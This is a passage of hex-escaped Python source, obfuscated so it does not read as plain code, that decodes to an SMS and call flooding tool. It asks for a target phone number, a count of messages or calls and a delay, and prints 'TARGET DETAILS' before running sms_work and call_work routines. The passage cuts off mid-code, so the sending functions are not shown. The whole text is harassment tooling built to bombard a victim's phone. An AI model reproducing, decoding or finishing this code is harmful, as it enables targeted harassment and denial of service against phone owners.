b\x33\x7d\x5d\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x64\x6c\x20\x3c\x20\x35\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x43\x61\x6e\x27\x74\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4c\x65\x73\x73\x20\x54\x68\x65\x6e\x20\x35\x20\x53\x65\x63\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x35\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20
\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x73\x6d\x73\x5f\x77\x6f\x72\x6b\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x35\x7d\x54\x41\x52\x47\x45\x54\x20\x44\x45\x54\x41\x49\x4c\x53\x7b\x30\x7d\x5d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x38\x7d\x3a\x7b\x34\x7d\x7b\x35\x7d\x20\x2b\x7b\x33\x7d\x7b\x36\x7d\x20\x7b\x37\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x73\x74\x72\x28\x63\x63\x29\x2c\x70\x6e\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x20\x54\x6f\x20\x53\x65\x6e\x74\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d
\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x6e\x6d\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x64\x6c\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x7b\x36\x7d\x45\x6e\x74\x65\x72\x7b\x34\x7d\x20\x7b\x33\x7d\x54\x6f\x20\x43\x6f\x6e\x74\x69\x6e\x75\x65\x2e\x2e\x2e\x2e\x5c\x6e\x5c\x74\x5c\x74\x49\x66\x20\x59\x6f\x75\x20\x57\x61\x6e\x74\x20\x54\x6f\x20\x43\x68\x61\x6e\x67\x65\x20\x50\x72\x65\x73\x73\x20\x22\x7b\x36\x7d\x58\x7b\x34\x7d\x7b\x33\x7d\x22\x5c\x6e
\x5c\x74\x5c\x74\x5c\x74\x5c\x74\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x58\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x73\x6d\x73\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6d\x73\x5f\x73\x61\x76\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x0a\x64\x65\x66\x20\x6e\x6f\x5f\x63\x61\x6c\x6c\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x4e\x6f\x2e\x6f\x66\x20\x43\x61\x6c\x6c\x20\x54\x6f\x20\x4d\x61\x6b\x65\x7b\x35\x7d\x28\x7b\x33\x7d\x4d\x61\x78\x69\x6d\x75\x6d\x20\x32\x30\x7b\x35\x7d\x29\x20\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x66\x6c\x6f\x61\x74\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x7b\x35\x7d\x28\x7b\x30\x7d\x69\x6e\x20\x73\x65\x63\x6f\x6e\x64\x73\x7b\x35\x7d\x29\x20\x7b\x33\x7d\x5b\x7b\x32\x7d\x52\x65\x63\x6f\x6d\x6d\x65
\x6e\x64\x65\x64\x20\x31\x30\x20\x73\x65\x63\x7b\x33\x7d\x5d\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x64\x6c\x20\x3c\x20\x31\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x43\x61\x6e\x27\x74\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4c\x65\x73\x73\x20\x54\x68\x65\x6e\x20\x31\x30\x20\x53\x65\x63\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x31\x30\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x63\x61\x6c\x6c\x5f\x77\x6f\x72\x6b\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x35\x7d\x54\x41\x52\x47\x45\x54\x20\x44\x45\x54\x41\x49\x4c\x53\x7b\x30\x7d\x5d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b
\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x38\x7d\x3a\x7b\x34\x7d\x7b\x35\x7d\x20\x2b\x7b\x33\x7d\x7b\x36\x7d\x20\x7b\x37\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x73\x74\x72\x28\x63\x63\x29\x2c\x70\x6e\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x20\x54\x6f\x20\x53\x65\x6e\x74\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x6e\x6d\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74
\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x64\x6c\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x7b\x36\x7d\x45\x6e\x74\x65\x72\x7b\x34\x7d\x20\x7b\x33\x7d\x54\x6f\x20\x43\x6f\x6e\x74\x69\x6e\x75\x65\x2e\x2e\x2e\x2e\x5c\x6e\x5c\x74\x5c\x74\x49\x66\x20\x59\x6f\x75\x20\x57\x61\x6e\x74\x20\x54\x6f\x20\x43\x68\x61\x6e\x67\x65\x20\x50\x72\x65\x73\x73\x20\x22\x7b\x36\x7d\x58\x7b\x34\x7d\x7b\x33\x7d\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x5c\x74\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x58\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x63\x61\x6c\x6c\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x61\x6c\x6c\x5f\x73\x61\x76\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d
\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x64\x65\x66\x20\x73\x6d\x73\x5f\x77\x6f\x72\x6b\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x63\x63\x0a\x20\x20\x20\x20\x67
\x6c\x6f\x62\x61\x6c\x20\x70\x6e\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x69\x6e\x74\x28\x6e\x6d\x29\x0a\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x35\x30\x30\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x31\x30\x30\x0a\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x20\x3e\x20\x6d\x61\x78\x6c\x69\x6d\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x57\x69\x6c\x6c\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4f\x6e\x6c\x79\x27\x20\x2b\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x20\x2b\x20\x27\x20\x53\x4d\x53\x20\x41\x74\x20\x4f\x6e\x63\x65\x2e\x2e\x21\x5c\x6e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x4e\x75\x6d\x62\x65\x72\x20\x4f\x66\x20\x53\x4d\x53\x20\x48\x61\x73\x20\x62\x65\x65\x6e\x20\x53\x65\x74\x20\x54\x6f\x20\x27\x20\x2b\x20\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x6d\x61\x78\x6c\x69\x6d\x0a\x0a\x64\x65\x66\x20\x63\x61\x6c\x6c\x5f\x77\x6f\x72\x6b\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x63\x63\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x70\x6e\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x69\x6e\x74\x28\x6e\x6d\x29\x0a\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x32\x30\x0a\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x20\x3e\x20\x6d\x61\x78\x6c\x69\x6d\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70
